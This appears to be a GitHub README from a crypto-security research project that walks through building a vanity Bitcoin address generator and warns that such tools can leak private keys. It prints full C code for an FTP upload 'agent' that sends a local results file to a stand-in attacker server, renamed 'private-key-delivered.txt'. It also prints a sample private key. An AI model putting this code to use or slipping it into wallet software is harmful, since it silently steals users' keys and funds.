Skip to content

Latest commit

 

History

History
435 lines (201 loc) · 19.4 KB

README.md

File metadata and controls

435 lines (201 loc) · 19.4 KB

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Over the years, a whole cult has formed in the crypto community to create beautiful addresses for crypto wallets. Everyone can generate a «beautiful» address for themselves, which will not only be unique, but will also contain a certain combination of letters and numbers. This is a very exciting and interesting process, but the risk associated with involving a third party and intercepting the private key to the crypto wallet cannot be completely ruled out. We have all heard about independent aggregators CoinMarketCapand CoinGeckothese are the most popular platforms for tracking prices on the stock exchange, but in this article we will not consider the mechanisms and functions of these sites. We will talk about hidden codes in vanitygenoclvanitygenand their rapid spread on popular sites.

This is a research project created for information security purposes.

Many users are not satisfied with the standard random crypto wallet addresses, and for this reason they use various programs, utilities and plugins to create beautiful cryptocurrency addresses.

According to the TAdviser portal, victims are increasingly becoming victims due to the use of unverified software.

Coingecko-VanityGenis a command-line utility that is able to generate cryptocurrency addresses according to the given initial parameters.

Source code "Coingecko-VanityGen" for creating personalized addresses.

Source code «Coingecko-VanityGen» for generating personalized addresses.

The selection of a utility is based on a probabilistic search, which takes some time.
The time depends on the complexity of the given pattern, computer speed and luck. To increase the speed of generating cryptocurrency addresses, there oclvanitygenis one that uses OpenCLcompatibleGPU

In many of our studies, we use Google Colaband for our own review we will parse for the Coingecko-VanityGen files in the 12CoingeckoAgentFtpupload repository

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Coingecko-VanityGen works with GPU runtime support(Google Colab)and generates beautiful crypto wallet addresses for the complete aggregator list according to its own parametersCoingecko.

How to save private keys?

To understand and understand, we will move on to the experimental part:

Open  [TerminalGoogleColab] .

Let’s use the «12CoingeckoAgentFtpupload» repository .

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/12CoingeckoAgentFtpupload/

ls

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Update and install g++ libgmp3-dev libmpfr-dev

apt-get update

sudo apt-get install g++ -y

sudo apt-get install libgmp3-dev libmpfr-dev -y

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Assembly:

make

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Let’s run the command: lsand we see that it coingeckogenwas created successfully!

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe


Run LIST and check all existing cryptocurrencies from the CoinGecko aggregator

./coingeckogen -C LIST

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe


Let’s run «coingeckogen» and generate a Bitcoin Address with the prefix «1DEEP»:

./coingeckogen 1DEEP

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Pattern: 1DEEP
Address: 1DEEPQxozZXeUmuVZxKb7JjHq28DhX99AG
Privkey: 5JdG1jvsDgHrS8E8NpRLabzrA1tCbR6ePp9zvv1q1dV6efpSqMH
crypto > 

Let’s open bitaddress  and  check:

bitaddress

bitaddress

Why can compiled programs reveal private keys?

www.securitylab.ru/news/531888.php

www.securitylab.ru/news/531888.php

You can read the article in the information portal SecurityLab

A secret code can be sewn into the source code of the program:

Pay attention to the ftpupload.c code

cURL is a cross-platform command-line utility that allows you to interact with many different servers over many different protocols with the syntaxURL.

This code can send private keys to FTP - сервер an attacker

/***************************************************************************
 *                                  _   _ ____  _
 *  Project                     ___| | | |  _ \| |
 *                             / __| | | | |_) | |
 *                            | (__| |_| |  _ <| |___
 *                             \___|\___/|_| \_\_____|
 *
 * Copyright (C) 1998 - 2022, Daniel Stenberg, <[email protected]>, et al.
 *
 * This software is licensed as described in the file COPYING, which
 * you should have received as part of this distribution. The terms
 * are also available at https://curl.se/docs/copyright.html.
 *
 * You may opt to use, copy, modify, merge, publish, distribute and/or sell
 * copies of the Software, and permit persons to whom the Software is
 * furnished to do so, under the terms of the COPYING file.
 *
 * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
 * KIND, either express or implied.
 *
 * SPDX-License-Identifier: curl
 *
 ***************************************************************************/
#include <stdio.h>
#include <string.h>
 
#include <curl/curl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#ifdef WIN32
#include <io.h>
#else
#include <unistd.h>
#endif
 
/* <DESC>
 * Performs an FTP upload and renames the file just after a successful
 * transfer.
 * </DESC>
 */
 
#define LOCAL_FILE      "/tmp/Result.txt"
#define UPLOAD_FILE_AS  "Result.txt"
#define REMOTE_URL      "ftp://example.com/"  UPLOAD_FILE_AS
#define RENAME_FILE_TO  "private-key-delivered.txt"
 
/* NOTE: if you want this example to work on Windows with libcurl as a
   DLL, you MUST also provide a read callback with CURLOPT_READFUNCTION.
   Failing to do so will give you a crash since a DLL may not use the
   variable's memory when passed in to it from an app like this. */
static size_t read_callback(char *ptr, size_t size, size_t nmemb, void *stream)
{
  unsigned long nread;
  /* in real-world cases, this would probably get this data differently
     as this fread() stuff is exactly what the library already would do
     by default internally */
  size_t retcode = fread(ptr, size, nmemb, stream);
 
  if(retcode > 0) {
    nread = (unsigned long)retcode;
    fprintf(stderr, "*** We read %lu bytes from file\n", nread);
  }
 
  return retcode;
}
 
int main(void)
{
  CURL *curl;
  CURLcode res;
  FILE *hd_src;
  struct stat file_info;
  unsigned long fsize;
 
  struct curl_slist *headerlist = NULL;
  static const char buf_1 [] = "RNFR " UPLOAD_FILE_AS;
  static const char buf_2 [] = "RNTO " RENAME_FILE_TO;
 
  /* get the file size of the local file */
  if(stat(LOCAL_FILE, &file_info)) {
    printf("Couldn't open '%s': %s\n", LOCAL_FILE, strerror(errno));
    return 1;
  }
  fsize = (unsigned long)file_info.st_size;
 
  printf("Local file size: %lu bytes.\n", fsize);
 
  /* get a FILE * of the same file */
  hd_src = fopen(LOCAL_FILE, "rb");
 
  /* In windows, this will init the winsock stuff */
  curl_global_init(CURL_GLOBAL_ALL);
 
  /* get a curl handle */
  curl = curl_easy_init();
  if(curl) {
    /* build a list of commands to pass to libcurl */
    headerlist = curl_slist_append(headerlist, buf_1);
    headerlist = curl_slist_append(headerlist, buf_2);
 
    /* we want to use our own read function */
    curl_easy_setopt(curl, CURLOPT_READFUNCTION, read_callback);
 
    /* enable uploading */
    curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
 
    /* specify target */
    curl_easy_setopt(curl, CURLOPT_URL, REMOTE_URL);
 
    /* pass in that last of FTP commands to run after the transfer */
    curl_easy_setopt(curl, CURLOPT_POSTQUOTE, headerlist);
 
    /* now specify which file to upload */
    curl_easy_setopt(curl, CURLOPT_READDATA, hd_src);
 
    /* Set the size of the file to upload (optional).  If you give a *_LARGE
       option you MUST make sure that the type of the passed-in argument is a
       curl_off_t. If you use CURLOPT_INFILESIZE (without _LARGE) you must
       make sure that to pass in a type 'long' argument. */
    curl_easy_setopt(curl, CURLOPT_INFILESIZE_LARGE,
                     (curl_off_t)fsize);
 
    /* Now run off and do what you have been told! */
    res = curl_easy_perform(curl);
    /* Check for errors */
    if(res != CURLE_OK)
      fprintf(stderr, "curl_easy_perform() failed: %s\n",
              curl_easy_strerror(res));
 
    /* clean up the FTP commands list */
    curl_slist_free_all(headerlist);
 
    /* always cleanup */
    curl_easy_cleanup(curl);
  }
  fclose(hd_src); /* close the local file */
 
  curl_global_cleanup();
  return 0;
}

For the test , upload the ftpupload.c file to the “12CoingeckoAgentFtpupload” directory

Compile Agent Ftpupload:

gcc -o agentftpupload ftpupload.c -lcurl

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

Access rights:

chmod +x agentftpupload

Coingecko & Agent Ftpupload create beautiful crypto wallet addresses, but keep the private key safe

./agentftpupload

The process of intercepting a private key:

As we said above, in order to understand how the private key is intercepted, let’s run all the commands from the source code step by step . To do this, we will create a test server with a «cryptodeeptech» directory:

The process of intercepting a private key

The process of intercepting a private key

As we can see from the demo, the following file was uploaded to the test server: private-key-delivered.txt

private-key-delivered.txtis a file that contains the private keys of the software user.

The whole process is hidden from the user .

We highly recommend:

  • use only proven software;
  • see the source code;
  • do the assembly yourself;
  • do an update;

This video was created for the  CRYPTO DEEP TECH portal  to ensure the financial security of data and cryptography on elliptic curves  secp256k1 against weak signatures  ECDSA in cryptocurrency BITCOIN

Source

Telegram :  https://t.me/cryptodeeptech

Video: https://youtu.be/sB91EE-1mJo

Source: https://cryptodeep.ru/coingecko-agent-ftpupload


Donation Address
BTC 1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV
ETH 0xaBd66CF90898517573f19184b3297d651f7b90bf